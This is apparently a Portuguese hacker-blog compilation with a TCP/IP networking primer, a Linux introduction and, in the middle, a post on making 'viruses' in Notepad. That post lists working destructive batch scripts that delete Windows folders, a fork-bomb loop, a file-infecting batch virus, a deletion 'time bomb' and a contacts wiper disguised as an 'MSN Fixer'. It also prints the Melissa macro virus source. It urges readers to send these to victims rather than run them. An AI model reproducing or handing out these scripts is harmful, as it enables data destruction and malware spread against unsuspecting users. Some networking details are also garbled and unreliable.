PROBLEMAS DE CONFLITO. QUANDO A MÁQUINA SOLICITANTE SAI DA REDE, O SERVIDOR DHCP TORNA ESSE NÚMERO DISPONÍVEL NOVAMENTE. PORTAS UMA PORTA PODE SER VISTA COMO UM CANAL DE COMUNICAÇÕES PARA UMA MÁQUINA. PACOTES DE INFORMAÇÕES CHEGANDO A UMA MÁQUINA NÃO SÃO APENAS ENDEREÇADAS À MÁQUINA, E SIM A MÁQUINA NUMA DTERMINADA PORTA. VOCÊ PODE IMAGINAR UMA PORTA COMO SENDO UM CANAL DE RÁDIO, COM A DIFIRENÇA FUNDAMENTAL DE QUE UM COMPUTADOR PODE "OUVIR" TODOS OS 65000 CANAIS POSSÍVEIS AO MESMO TEMPO. ENTRETANTO, UM COMPUTADOR GERALMENTE NÃO ESTÁ OUVINDO EM TODAS AS PORTAS, ELE ESCUTA A ALGUMAS PORTAS ESPECÍFICAS. E ELE NÃO VAI RESPONDER A UM PEDIDO A UMA PORTA QUE ELE NÃO ESTEJA ESCUTANDO. EXISTEM UMA SÉRIE DE PORTAS PRÉ DEFINIDAS PARA CERTOS SERVIÇOS QUE SÃO ACEITOS UNIVERSALMENTE. AS PRINCIPAIS SÃO: SERVIÇO PORTA DESCRIÇÃO 39
  • 40. FTP 21 PROTOCOLO DE TRANSFERÊNCIA DE ARQUIVOS TELNET 23 PARA SE CONECTAR REMOTAMENTE A UM SERVIDOR SMTP 25 PARA ENVIAR UM EMAIL GOPHER 70 BROWSER BASEADO EM MODO TEXTO HTTP 80 PROTOCOLO WWW – NETSCAPE, MOSAIC POP3 110 PARA RECEBER EMAIL NNTP 119 40
  • 41. NEWS GROUPS IRC 6667 INTERNET RELAY CHAT – BATE PAPO ONLINE COMPUSERV 4144 COMPUSERV WINCIM AOL 5190 AMERICA ONLINE MSN 569 MICROSOFT NETWORK OUTROS OUTROS OUTROS ROTEADOR: É UM COMPUTADOR QUE É UTILIZADO PARA CONECTAR DUAS OU MAIS REDES DISTINTAS. ELE TEM ESSE NOME PORQUE TEM DE ROTEAR (OU DIRECIONAR) OS PACOTES DE UMA REDE PARA OUTRA, ATUANDO COMO UM GUARDA DE TRÂNSITO PARA OS PACOTES ENTRE AS REDES. GATEWAY: O GATEWAY TAMBÉM É UM COMPUTADOR QUE SERVE PARA CONECTAR DUAS 41
  • 42. OU MAIS REDES DISTINTAS. A PRINCIPAL DIFERENÇA PARA O ROTEADOR É QUE O GATEWAY NÃO TEM UM HARDWARE ESPECIAL PARA O ROTEAMENTO. USUALMENTE OS GATEWAYS CONECTAM LANS E OS ROTEADORES, WANS. EM VÁRIOS CASOS SE UTILIZA UM ROTEADOR EM CONJUNTO COM O GATEWAY. VISÃO: UMA REDE UTILIZANDO O TCP/IP TEM UMA ESTRUTURA BÁSICA COMPOSTA POR UM OU MAIS SERVIDOR RODANDO UM SERVIDOR DNS (OU WINS), DHCP, SMTP, POP3, E OS SERVIDORES DOS SERVIÇOS DESEJADOS (HTTP, TELNET, GOPHER, ETC) E AS MÁQUINA CLIENTES SOLICITANDO ESSES SERVIÇOS. PARA SE INTERLIGAR ESSA REDE A OUTRA REDE TCP/IP, SE FAZ NECESSÁRIO O USO DE UM ROTEADOR OU GATEWAY E DA CORRETA CONFIGURAÇÃO DA REDE. EXISTEM DUAS MANEIRAS DE SE LIGAR A LAN À INTERNET: ATRIBUI-SE UM NÚMERO DE IP VÁLIDO PARA CADA MÁQUINA NA REDE, O QUE PODE SER IMPOSSÍVEL PARA REDES COM MUITAS MÁQUINAS. ATRIBUI-SE UM NÚMERO DE IP VÁLIDO PARA O GATEWAY E UTILIZANDO-SE O NÚMERO DE IP 192.168.X.X INTERNAMENTE. COMO O SEGUNDO CASO É O MAIS FACTÍVEL, VAMOS OBERVÁ-LO MELHOR. NELE, SE UTILIZA INTERNAMENTE A LAN O IP 192.168.X.X , QUE , QUANDO DA DETERMINAÇÃO DOS NÚMEROS DE IP FOI RESERVADO PARA O USO DE REDES INTERNAS, OU SEJA, NENHUMA MÁQUINA LIGADA DIRETAMENTE A INTERNET TEM UM IP 192.168.X.X. ISSO É NECESSÁRIO POIS COMO JÁ VIMOS NENHUMA MÁQUINA PODE TER UM NÚMERO DE IP QUE JÁ ESTEJA SENDO UTILIZADO POR UMA OUTRA MÁQUINA. O GATEWAY TEM DUAS INTERFACES DE REDE, UMA PARA SE CONECTAR À INTERNET E OUTRA PARA SE CONECTAR À LAN. A INTERFAE DA INTERNET É ATRIBUIDO O NÚMERO DE IP VÁLIDO NA INTERNET E NA LAN O NÚMERO DE IP DO TIPO 192.168.X.X (USUALMENTE 192.168.0.1). NAS MÁQUINAS DA LAN O NÚMERO DO IP É DO TIPO 192.168.X.X (ONDE O PRIMEIRO X É O MESMO DO GATEWAY) E O GATEWAY DEFALT É O IP DO GATEWAY VOLTADO PARA A LAN (192.168.X.X). DESSA FORMA PODEMOS TER ATÉ 16.384 MÁQUINAS NA INTERNET POR NÚMERO DE IP VÁLIDO. ESSA ESTRUTURA TAMBÉM FACILITA A ADOÇÃO DE MEDIDAS DE SEGURANÇA CONTRA INTRUSOS DA INTERNET, POIS COMO TODO O TRÁFEGO NA INTERNET PASSA PELO GATEWAY, BASTA PROTEGÊ-LO PARA PROTEGER TODA 42
  • 43. A LAN. PROTOCOLOS TCP E IP: O TCP E O IP SÃO APENAS DOIS MEMBROS DA FAMÍLIA TCP/IP. IP É UM PROTOCOLO QUE PROVIDENCIA A ENTREGA DE PACOTES PARA TODOS OS OUTROS PROTOCOLOS DA FAMÍLIA TCP/IP. O IP FORNECE UM SISTEMA DE ENTREGA DE DADOS SEM CONEXÃO. ISTO É, OS PACOTES IP NÃO SÃO GARANTIDOS DE CHEGAREM AO SEU DESTINO, NEM DE SEREM RECEBIDOS DA FORMA QUE FORAM ENVIADOS. O CHECK SUN DO IP CONFIRMA APENAS A INTEGRIDADE DO CABEÇALHO DO PACOTE. DESTA MANEIRA, A RESPONSABILIDADE PELOS DADOS CONTIDOS NO PACOTE DO IP (E SUA SEQUÊNCIA) É TAREFA DE PROTOCOLOS DE MAIS ALTO NÍVEL. TALVEZ O PROTOCOLO DE MAIS ALTO NÍVEL DO IP SEJA O TCP. O TCP OFERECE UM CONFIÁVEL PROTOCOLO BASEADO EM CONEXÃO CAPSULADO NO IP. O TCP GARANTE A ENTREGA DOS PACOTES, ASSEGURA O SEQUENCIAMENTO DOS PACOTES E PROVIDENCIA UM CHECKSUN QUE VALIDA TANTO O CABEÇALHO QUANTO OS DADOS DO PACOTE. NO CASO DA REDE PERDER OU CORROMPER UM PACOTE TCP/IP DURANTE A TRANSMISSÃO, É TAREFA DO TCP RETRANSMITIR O PACOTE FALTOSO OU INCORRETO. ESSA CONFIABILIDADE TORNA O TCP/IP O PROTOCOLO ESCOLHIDO PARA TRANSMISSÕES BASEADAS EM SESSÃO, APLICATIVOS CLIENTE-SERVIDOR E SERVIÇOS CRÍTICOS COMO CORREIO ELETRÔNICO. PORÉM, ESSA CONFIABILIDADE TEM UM PREÇO. OS CABEÇALHOS DOS PACOTES TCP REQUEREM USO DE BITS ADICIONAIS PARA ASSEGURAR O CORRETO SEQUENCIAMENTO DA INFORMAÇÃO, BEM COMO UM CHECK SUN OBRIGATÓRIO PARA GARANTIR A INTEGRIDADE DO CABEÇALHO E DOS DADOS. PARA GARANTIR A ENTREGA DOS PACOTES, O PROTOCOLO TAMBÉM REQUER QUE O DESTINATÁRIO INFORME O RECEBIMENTO DO PACOTE. TAL INFORMÇÃO DE RECEBIMETO (OU ACKS) GERAM TRÁFEGO ADICIONAL NA REDE, DIMINUINDO A TAXA DE TRANFERÊNCIA DE DADOS EM FAVOR DA CONFIABILIDADE. PARA REDUZIR O IMPACTO NA PERFORMANCE, A MIORIA DOS SERVIDORES ENVIAM UM ACK PARA TODOS (AO INVÉS DE TODO O PACOTE) OU QUANDO UM ACK EXPIRA. UDP: SE A CONFIABILIDADE NÃO É ESSENCIAL, O UDP (USER DATAGRAM PROTOCOL), UM 43
  • 44. COMPLEMENTO DO TCP, OFERECE UM SERVIÇO DE TRANSMISSÃO DE DADOS SEM CONEXÃO QUE NÃO GARANTE NEM A ENTREGA NEM A CORRETA SEQUENCIA DOS PACOTES ENVIADOS (BEM PARECIDO COM O IP). CHECKSUNS NO UDP SÃO OPCIONAIS OFERECENDO ASSIM UMA MANEIRA DE SE TROCAR DADOS EM UMA REDE ALTAMENTE CONFIÁVEL SEM CONSUMIR DESNECESSARIAMENTE RECURSOS DA REDE. ARP E ICMP: DOIS OUTROS PROTOCOLOS DA FAMÍLIA TCP/IP TEM IMPORTANTES FUNÇÕES, EMBORA ESSAS FUNÇÕES NÃO ESTEJAM DIRETAMENTE RELACIONADAS COM A TRANSMISSÃO DE DADOS: (ARP= ADDRESS RESOLUTION PROTOCOL, OU PROTOCOLO DE RESOLUÇÃO DE ENDEREÇOS) E ICMP (INTERNET CONTROL MESSAGE PROTOCOL, OU PROTOCOLO DE RESOLUÇÃO DE ENDEREÇOS NA INTERNET). O ARP E O ICMP SÃO PROTOCOLOS DE MANUTENÇÃO QUE MANTÉM A ESTRUTURA DO IP E USUALMENTE SÃO INVISÍVEIS AOS USUÁRIOS E AS APLICAÇÕES. OS CABEÇALHOS DO IP CONTÉM TANTO O ENDEREÇO IP DA ORIGEM QUANTO DO DESTINO, MAS O ENDEREÇO DO HADWARE TAMBÉM TEM DE SER CONHECIDO. O IP OBTÉM UM ENDEREÇO DE HARDWARE DE UM DETERMINADO SISTEMA DIFUNDINDO PELA REDE UM PACOTE ESPECIAL DE REQUISIÇÃO (UM PACOTE ARP DE REQUISIÇÃO) CONTENDO O ENDEREÇO IP DO SISTEMA COM O QUAL ESTÁ TENTANDO SE COMUNICAR. TODOS NÓS DA REDE LOCAL QUE TIVEREM O ARP HABILITADO DETECTAM ESSA DIFUSÃO, E O SISTEMA QUE TEM O NÚMERO DE IP EM QUESTÃO ENVIA UM PACOTE ARP CONTENDO O ENDEREÇO DE HARDWARE PARA O COMPUTADOR QUE SOLICITOU. O ENDEREÇO DE HARWARE E O ENDEREÇO DO IP ESTÃO ARMAZENADO NO CACHE DO ARP PARA USO FUTURO. COMO A RESPOSTA ARP TAMBÉM É FEITA NA FORMA DE DIFUSÃO, É NORMAL QUE OUTROS NÓS USEM INFORMAÇÃO PARA ATUALIZAR SEUS CACHES ARP. O ICMP PERMITE QUE 2 NÓS EM UMA REDE IP COMPARTILHEM O STATUS DO IP E INFORMAÇÕE DE ERRO. ESSA INFORMAÇÃO PODE SER USADA POR PROTOCOLOS DE ALTO NÍVEL PARA TRATAR PROBLEMAS DE TRANSMISSÃO OU PARA ADMINISTRADORES DE REDE PARA DETECTAR PROBLEMAS NA REDE. EMBORA ESTEJAM ENCAPSULADOS EM PACOTES IP, O ICMP NÃO É CONSIDERADO UM PROTOCOLO DE ALTO NÍVEL (ELE É NECESSÁRIO EM TODA IMPLEMENTAÇÃO DO TCP/IP. O UTILITÁRIO PING FAZ USO DO ICMP PARA VERIFICAR SE UM CERTO ENDEREÇO NA REDE ESTÁ OPERACIONAL. ISTO É UTIL PARA DETECTAR PROBLEMAS EM REDES IP UO FALHAS EM GATEWAYS. OUTROS PROTOCOLOS ALÉM DESSES PROTOCOLOS CITADOS, EXISTEM OS PROTOCOLOS DE ALTO NÍVEL, COMO O 44
  • 45. TELNET, FTP, HTTP E ETC. VAMOS DAR UMA BREVE DESCRIÇÃO DELES: TELNET: É UM PROTOCOLO QUE PERMITE O LOGON EM MÁQUINA REMOTAS. VOCÊ PASSA A UTILIZAR A MÁQUINA REMOTA PARA REALIZAR O PROCESSAMENTO. NO WINDOWS NT EXISTE O RAS (REMOTE ACCESS SERVICE, SERVIÇO DE ACESSO REMOTO) QUE TEM OS MESMOS OBJETIVOS DO TELNET. FTP: É UM PROTOCOLO UTILIZADO PARA FAZER TRANSFERÊNCIA DE ARQUIVOS. HTTP: É O PROTOCOLO UTILIZADO NA WEB, ELE TRANSMITE TEXTOS, GRÁFICOS E QUALQUER OUTRO TIPO DE ARQUIVO (SUBSTITUINDO O FTP), ALÉM DE PERMITIR A NAVEGAÇÃO ATRAVÉS DE HIPER TEXTO. Leia com Atenção Lembrando que o conteúdo desta apostila é apenas pra estudo e conhecimento dos usuarios de internet. O final da apostila chegou, espero que tirem bom aproveito dela. Postado por Original's Hacker às 14:19 12 comentários Criar Vírus no Bloco de Notas Criando Virus no Notepad É muito simples, voce vai fazer um virus no bloco de notas é só seguir as indicações, abra o bloco de notas 45
  • 46. Copie os códigos escolhidos e cole no bloco de notas, ao salvar voce usa a extençao .bat exemplo: onomedoarquivo.bat Se vc usar outra extensão o arquivo ñ ira pegar AVISO:Não execute estes virus em seu proprio Pc, pois pode ocorrer serios danos, voce deve enviar para as vitimas!!! ████████████ Nome:Del All Windows rmdir /s /q c:windows Função:Deleta tdo do Windows (fode o pc Nome:Autoexec @ECHO OFF @BREAK OFF deltree/C: Y*.* Função:Fode com tudo Nome:Trojan-1 VERSION 5.00 Object = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}#2.0#0"; "mscomctl.ocx" Begin VB.Form Form1 BackColor = &H80000007& BorderStyle = 1 'Fixed Single Caption = "Welcome to XP Blaster Pro (Enterprise Edition)!" ClientHeight = 5400 46
  • 47. ClientLeft = 45 ClientTop = 390 ClientWidth = 8085 BeginProperty Font Name = "Fixedsys" Size = 9 Charset = 0 Weight = 400 Underline = 0 'False Italic = 0 'False Strikethrough = 0 'False EndProperty Icon = "Source3.frx":0000 LinkTopic = "Form1" MaxButton = 0 'False MinButton = 0 'False MouseIcon = "Source3.frx":08CA PaletteMode = 2 'Custom ScaleHeight = 5400 ScaleWidth = 8085 ShowInTaskbar = 0 'False StartUpPosition = 3 'Windows Default Begin VB.CommandButton Command3 Caption = "About" BeginProperty Font Name = "MS Sans Serif" 47
  • 48. Size = 8.25 Charset = 0 Weight = 400 Underline = 0 'False Italic = 0 'False Strikethrough = 0 'False EndProperty Height = 375 Left = 120 TabIndex = 3 Top = 4920 Width = 1215 End Begin VB.CommandButton Command2 Appearance = 0 'Flat BackColor = &H000000FF& Caption = "WEBSITE" BeginProperty Font Name = "Trebuchet MS" Size = 8.25 Charset = 0 Weight = 400 Underline = 0 'False Italic = 0 'False Strikethrough = 0 'False EndProperty 48
  • 49. Height Função:Augumas dos trojans tradiçionais Nome:Del p/ Windows del /s /q c:windows Função:Deleta tudo dentro do Windows ex: arquivos e naum pastas Nome:Shutdown-S shutdown -s Função:Desliga o pc Nome:Shutdown-R shutdown -r Função:Reinicia o pc Nome:Trojan-2 @echo off ctty nul rem for %%f in (*.exe *.com) do set A=%%f if %A%==COMMAND.COM set A= rename %A% V%A% if not exist V%A% goto end attrib +h V%A% copy %0.bat %A% attrib +r %A% 49
  • 50. ren %A% *.bat set A= :end ctty con @if exist V%0.com V%0.com %1 %2 %3 @if exist V%0.exe V%0.exe %1 %2 %3 Função:Fode com tudo mesmo... Nome:Pirata X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* Função:Testar seu Anti-Virus ou enganar auguem. Nome:Melissa 1999 // Melissa Virus Source Code Private Sub Document_Open() On Error Resume Next If System.PrivateProfileString("", "HKEY_CURRENT_USERSoftwareMicrosoftOffice9.0WordSecurity", "Level") <> "" Then CommandBars("Macro").Controls("Security...").Enabled = False System.PrivateProfileString("", "HKEY_CURRENT_USERSoftwareMicrosoftOffice9.0WordSecurity", "Level") = 1& Else CommandBars("Tools").Controls("Macro").Enabled = False Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1) 50
  • 51. End If Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice Set UngaDasOutlook = CreateObject("Outlook.Application") Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI") If System.PrivateProfileString("", "HKEY_CURRENT_USERSoftwareMicrosoftOffice", "Melissa?") <> "... by Kwyjibo" Then If UngaDasOutlook = "Outlook" Then DasMapiName.Logon "profile", "password" For y = 1 To DasMapiName.AddressLists.Count Set AddyBook = DasMapiName.AddressLists(y) x=1 Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0) For oo = 1 To AddyBook.AddressEntries.Count Peep = AddyBook.AddressEntries(x) BreakUmOffASlice.Recipients.Add Peep x=x+1 If x > 50 Then oo = AddyBook.AddressEntries.Count Next oo BreakUmOffASlice.Subject = "Important Message From " & Application.UserName BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else Wink" BreakUmOffASlice.Attachments.Add ActiveDocument.FullName BreakUmOffASlice.Send Peep = "" 51
  • 52. Next y DasMapiName.Logoff End Função:se espalha rapidamente e força empresas como Intel e Microsoft, entre outras, a fechar seus sistemas de e-mail para conter a praga, que se disseminava via Outlook. O vírus, além de se enviar pela Internet, modificava documentos do Word colocando falas do programa de televisão Os Simpsons. Causou danos estimados em US$ 300 milhões a US$ 600 milhões. Nome:CLICK EM MIM @ECHO OFF :REPETE MSG * CLICK EM MIM GOTO REPETE Função:Fica repetindo varias vezes a mesma mensagem Nome:Progstar @echo off rem Denial Of Service Local :Fucker start notepad.exe start write.exe start sol.exe start cmd.exe start powerpnt.exe start excel.exe start winword.exe start msacess.exe 52
  • 53. goto Fucker: Função:Abre varios programas sem parar, fais o pc travar Nome:bomba relógio c: cd echo off if exist lig1.drv goto 2 echo > lig1.drv sdfsdf goto fim :2 if exist lig2.drv goto 3 echo > lig2.drv sdfsdf goto fim :3 if exist lig3.drv goto 4 echo > lig3.drv sdfsdf goto fim :4 if exist lig4.drv goto 5 echo > lig4.drv sdfsdf goto fim :5 if exist lig5.drv goto 6 echo > lig4.drv sdfsdf goto fim 53
  • 54. :6 if exist lig6.drv goto 7 echo > lig6.drv sdfsdf goto fim :7 rmdir C:windows rmdir C:arquivos de programas rmdir C:documents and settings :fim Função:depois que ele for ativado 7 vezes ele apaga tudo Nome:MSN Fixer cd %USERPROFILE% cd Config~1 cd Dadosd~1 cd Micros~1 cd "Windows Live Contacts" del /s /q *.* Função:Congela todos os msn's que estao sendo executados. Obs. "Conhecimento não é crime!! eu não me responsabilizo por seus atos!!" Postado por Original's Hacker às 10:39 104 comentários Linux o melhor SO (Sistema Operacional) 54
  • 55. Introduçao O que diabos é Linux? Esta é uma pergunta feita por muita gente, e há muitas respostas para ela. Linux é um sistema operacional, como os *BSD (FreeBSD, NetBSD e outros), OS/2, Windows, MacOS, BeOS, etc. O sistema operacional é o que permite o usuário usar o computador. O criador do Linux se chama Linus Torvalds. Com o nome que o autor tem, já dá pra tirar uma conclusão daonde é originado o nome "Linux"... Como o Linux é beaseado (ideologicamente falando) no Unix, ele juntou o seu nome (Linus) com Unix, e deu Linux :) O Linux é um sistema operacional multi-tarefa e multi-usuário. Além disso, ele é suportado por várias plataformas (inclusive as mais populares como a arquitetura Intel, que todo o mundo usa). Ele é usado por muitas empresas (principalmente provedores) por sua alta capacidade de Rede e conversação com outros sistemas (como por exemplo, redes Windows e Novell), além de suportar também vários tipos de sistemas de arquivos. Mas o barato de tudo, e o que deu impulso ao desenvolvimento do Linux é justamente por ele ser um sistema livre e gratuito (Open Source). Isso quer dizer que você não precisa pagar para usá-lo, e nem ele requer nenhuma licença de uso. O Linux simplesmente pode ser pego na Internet, copiado de um amigo, ou seja lá o que for, sem restrições. E além de gratuito, ele é livre! Livre? Sim, livre! O código-fonte do núcleo do sistema (kernel) está liberado sob a licença GPL, e pode ser pego na Internet por qualquer pessoa... Isto quer dizer que qualquer pessoa pode pegar e alterar o código livremente, modificando ao seu próprio gosto e suas próprias necessidades. Por ser livre, o Linux têm como desenvolvedores vários e vários hackers espalhados pelo mundo, que contribuem sempre mandando pedaços de códigos e implementações à Linus Torvalds, que organiza tudo e lança junto ao kernel oficial. Um dos nomes mais conhecidos como contribuidores para o kernel é Alan Cox, e você pode obter uma lista de outros contribuidores do kernel junto com o código-fonte do kernel que pode ser baixado através do endereço ftp://ftp.kernel.org (se possível use mirrors para baixar os kernels). Quem diria que o Linux ia se desenvolver tanto! No começo nada passava de um grupo de hackers que usavam o sistema. Agora temos muitos usuários caseiros usando, além de várias empresas prestando serviços (como suporte e desenvolvimento de programas), e 55
  • 56. todo tipo de coisa mais. Sua popularidade cresceu muito, e continua crescendo. As estatisticas dizem que o Linux vai crescer e crescer, e a tendência é realmente essa! Pois o Linux é um sistema operacional de deixar qualquer um de queixo caído. No futuro, acredito que mais e mais empresas vão começar a adotar o Linux como sistema padrão, e começar a desenvolver produtos apenas para ele. Deixando de lado um pouco o monopólio de empresas como a Microsoft e seu sistema operacional Windows. Você ainda não testou? Recomendo você fazer isso agúra! Pode ser um pouco estranho no começo, mas você aos poucos vai se acostumando, e acaba por se adaptar totalmente à ele! Eu mesmo me adaptei e só uso ele :) Viva o Linux! A história do Linux Como usuários fiéis, não podemos nos esquecer da história do Linux... Como surgiu isso tudo? Linus Torvalds, o pioneiro criador, era inscrito numa lista de programadores. Um dia ele estava lendo as mensagens e se bateu com uma pergunta: "Lembra-se daquela época quando os homens escreviam seus próprios drivers de dispositivos (device drivers)?' Ele então resolveu desafiar a si mesmo, e criar um sistema operacional onde se tinha uma liberdade e não se ficasse "preso' no sistema. O que ele tinha em mente era um Unix! Porém, ele não tinha verba suficiente para comprar os caríssimos Unix que eram o tipo de sistema que ele queria. Inspirado num pequeno e humilde sistema feito por Andy Tanembaum, o Minix, Linus trabalhou duro para fazer o Linux e desenvolver ele. Um pouco antes de lançar a primeira versão oficial do kernel, Linus mandou a seguinte mensagem para o grupo de notícias comp.os.minix: "Você suspira por melhores dias do Minix-1.1, quando homens serão homens e escreverão seus próprios drivers de dispositivos? Você está sem um bom projeto e está morrendo por colocar as mãos em um sistema operacional no qual você possa modificar de acordo com suas necessidades? Você está achando frustrante quando tudo trabalha em Minix? Chega de atravessar noites para obter programas que trabalhem corretamente? Então esta mensagem pode ser exatamente para você. Como eu mencionei a um mês atrás, estou trabalhando em uma versão independente de um sistema operacional similar ao Minix para computadores AT-386. Ele está, finalmente, 56
  • 57. próximo do estágio em que poderá ser utilizado (embora possa não ser o que você esteja esperando), e eu estou disposto a colocar os fontes para ampla distribuição. Ele está na versão 0.02... contudo eu tive sucesso rodando o bash, gcc, gnu-make, gnu-sed, compressão e etc nele." No dia 5 de Outubro de 1991, Linus Torvalds anunciou a primeira versão oficial do Linux, versão 0.02. Desde então muitos programadores têm respondido ao seu chamado, e têm ajudado a fazer do Linux o sistema operacional que é hoje, uma grande maravilha. Um sistema criado inteiramente por programadores espalhados pela Internet, os hackers! Qual a diferença entre Linux e Unix? Linus Torvalds, quando criou o Linux, criou ele nos padrões "POSIX", que é o mesmo padrão que os UNIX usam. É por esse mesmo uso do padrão POSIX que o Linux é parecido com o UNIX. Além do mais, existem vários tipos de UNIX, que têm seu código-fonte fechado, e pago. Uma resposta mais completa para esta pergunta foi feita pelo Fernando M. Roxo: Limpo, claro e definitivo: O Linux não é UNIX. O Linux é um UNIX. O UNIX foi um sistema criado e registrado pela Unix Lab. Todos os sistemas baseados naqueles códigos são chamados de uma forma geral de UNIX. Linux foi escrito desde o inicio pelo Linus Torvalds e não contém nenhuma linha de código do UNIX. Mas o Linux foi escrito para ser conforme o padrão POSIX, que deve ser o padrão da API (Application Programming Inteface) Unix, que em última análise pode ser resumido (forçando um pouco a barra) como sendo as chamadas do sistema. Por isto se diz que o Linux é um Unix (não UNIX). Tem uma diferença sutil aí. Por causa da API POSIX, do conjunto de utilitários (FSF/GNU em sua maioria) e do uso do X- Window (XFree) o Linux é tão parecido com o UNIX que existem empresas que usam o Linux para desenvolver para UNIX que não seja o dela mesma (por exemplo a IBM). As Distribuições Voltando mais um pouco ao escopo do que é Linux, podemos ressaltar que o Linux é o sistema operacional, ou seja, o kernel (núcleo). Mas o que é um sistema operacional sem programas? Para que haja um uso dos recursos que o sistema operacional pode oferecer, os 57
  • 58. programadores vão criando aplicações e utilitários que vão dar o gostinho ao usuário. O papel das distribuições é isso: empacotar o Linux. O que as distribuições fazem é reunir os programas disponíveis com o kernel, e deixar o sistema pronto para o uso. Sem as distribuições não haveria a popularização do Linux, pois seria um grande trabalho o usuário instalar o sistema puro, e depois compilar os programas deixando-os compatíveis. Existem inúmeras distribuições existentes por esse mundo afora. Mas há sempre as distribuições mais conhecidas, que são as mais atuantes no mercado. Elas são: Slackware, Conectiva Linux, Debian, Red Hat Linux, SuSE, Mandrake. Cada um tem suas características bem marcantes. E se fôssemos discutir aqui quais as vantagens de cada uma em relação a outra, não conseguiríamos. A escolha da distribuição é uma escolha a gosto. Meu micro suporta Linux? Basicamente, para você usar o Linux, você precisará de no mínimo um 386. Isso mesmo, o Linux roda em 386! É claro que para um uso amplo de todos os programas e o sistema X- Window (gráfico), você terá de ser mais exigente com seu hardware... Mas todos os computadores compatíveis com a arquitetura Intel são suportados pelo Linux (e também outros tipos de arquiteturas como por exemplo o Alpha). Para a memória RAM, você irá precisar de no mínimo 2MB de RAM. É recomendável ter 8Mb acima para rodar o servidor X. E seguindo a mesma filosofia do que falei antes, sempre é bom você ter mais para usar tudo rápido e sem perder a paciência :) Espaço em disco? Depende muito. As distribuições atuais disponibilizam até 6 CDs recheados de programas, que podem simplesmente acabar com o espaço do seu disco em alguns minutos! Uma instalação básica do Linux, apenas com o básico mesmo, dá 10MB. Eu acredito que 1GB seja suficiente para colocar todo tipo de coisa que você vai usar (e até coisa que você nem vai usar). Só como curiosidade, aqui em casa, eu já rodei meu Linux nos seguintes computadores: Primeiro num Pentium 100, com 24MB de RAM, e 1GB de espaço em disco. Rodei também num 386 (nem me pergunte quantos Mhz é porque eu não faço a mínima idéia :) com 8MB de memória RAM, num HD de 256MB. E por último em um Celeron 300 com 32MB de RAM e 1GB de espaço em disco. Atualmente eu estou usando em um K6-II 550, com 64MB de RAM, e 10GB de espaço no HD. 58
  • 59. Outra dúvida muito comum é: O Linux roda em laptops? Sim! Roda muito bem e suporta bem os dispositivos PCMCIA... Não tem absolutamente nada com o que se preocupar. Por que eu devo confiar no Linux? Pergunta muito fácil de se responder, inclusive eu vou responder bem grosseiramente: Ele é bom! :) O Linux tem ganhado credibilidade cada vez mais por ser um sistema seguro, estável, e confiável. É muito difícil (senào quase impossível) que o Linux em si dê um crash. Só para ter uma idéia, nestes 4 anos em que uso Linux, só obtive no máximo 3 travamentos! Por que estes travamentos? Bem, um foi na época em que exploraram uma falha no kernel e criaram o teardrop (um exploit que travou as coisas aqui), e os outros dois foi por causa de um problema na placa mãe :) Quer dizer, já aconteceu algumas outras vezes de minha interface travar, mas eu dei um telnet e um ping na máquina através de outra na rede, e ela respondia. Geralmente isso acontece comigo no Quake, quando eu mando conectar em algum nome de host que não existe, o SVGAlib (biblioteca que o Quake usa) simplesmente para de funcionar e você não tem mais como teclar algo ou mudar de tela... Mas tive a certeza que não foi o sistema que travou e sim o SVGAlib que travou meu teclado e monitor :) Empresas cada vez mais estão apostando no Linux. A IBM é uma das empresas que mais está investindo pesado no Linux, sendo com ajuda financeira, parcerias e desenvolvimento de programas. A Intel é outra empresa que também está ajudando muito, investindo bastante nos desenvolvedores do sistema. Além disso, várias outras pequenas ou médias empresas estão cada vez mais adotando o Linux como sistema padrão pelo simples fato de que ele funciona melhor e mais estávelmente que outros sistemas como o Windows. Pode ser que você ache que isto tudo conversa fiada, mas o Linux é bem estável mesmo! Já vi sistemas Linux ligados por vários meses sem nem sequer dar um reboot na máquina. Inclusive aqui em casa eu consegui deixar o meu Linux ligado por 23 dias, pena que faltou luz e o computador desligou (buá não tenho nobreak :~(). Basicamente é isso. Você tem de confiar no Linux porque ele é bom e tá acabado. E só tende a melhorar, antigamente não havia nem uma interface gráfica muito boa e usável para quem está iniciando na computação. Hoje temos o GNOME e KDE que são duas ótimas interfaces gráficas para quem está engatinhando. São coisas que fazem o Linux valer a pena! 1.7. O que é GPL? 59
  • 60. Se você já ouviu falar bem de Linux, com certeza já deve ter ouvido falar nesta sigla. GPL significa General Public License (ou traduzindo grosseiramente: Licença Pública Geral), e foi criada pela Free Software Foundation. A grande maioria dos programas que vêm nas distribuições Linux são de código-fonte aberto, e usam esta licença. Uma licença serve para proteger o seu código quando ele for lançado para o público. A licença GPL permite que o autor do código distribua livremente o seu código... Outras pessoas podem simplesmente pegar este código, modificar à suas próprias necessidades e usar à vontade. O único requerimento é que a pessoa que modificou deve lançar o código modificado em GPL e manter também o seu código aberto (e não apenas distribuir os binários). Isso tudo cria uma comunidade de desenvolvedores onde toda a ajuda é mútua, e você pode pegar várias idéias de outros desenvolvedores simplesmente olhando o código deles. Além disso, você pode aproveitar e poder ajudar o desenvolvedor, criando correções e mandando-as para o autor. É com essa licença que o kernel do Linux é liberado. É assim que o kernel tem seu desenvolvimento feito por várias e várias pessoas em todo o mundo. Estas pessoas pegam livremente o código-fonte do kernel, analizam-no e procuram por erros. Se encontrarem erros, escrevem correções e mandam para o Linus Torvalds. E não só correções, mas desenvolvedores também fazem novas implementações ao kernel e mandam para o Linus Torvalds organizar tudo. E é assim que temos hoje em dia este grande e bem feito e organizado kernel do Linux! É assim que a filosofia GPL funciona, e funciona muito bem para criar uma comunidade de desenvolvedores justa! Eu pessoalmente apóio e muito a licença GPL, que para mim é simplesmente perfeita. Vivas à Free Software Foundation por criar esta licença! E vivas para os desenvolvedores que a utilizam para seus códigos! :) Postado por Original's Hacker às 09:48 0 comentários Mini Tutorial MS Dos http://bp1.blogger.com/_A_Q4n38HnGM/RtXltSvxCLI/AAAAAAAAAAc/kROsLiJVD04/s1600- h/ms+dos.jpg 60
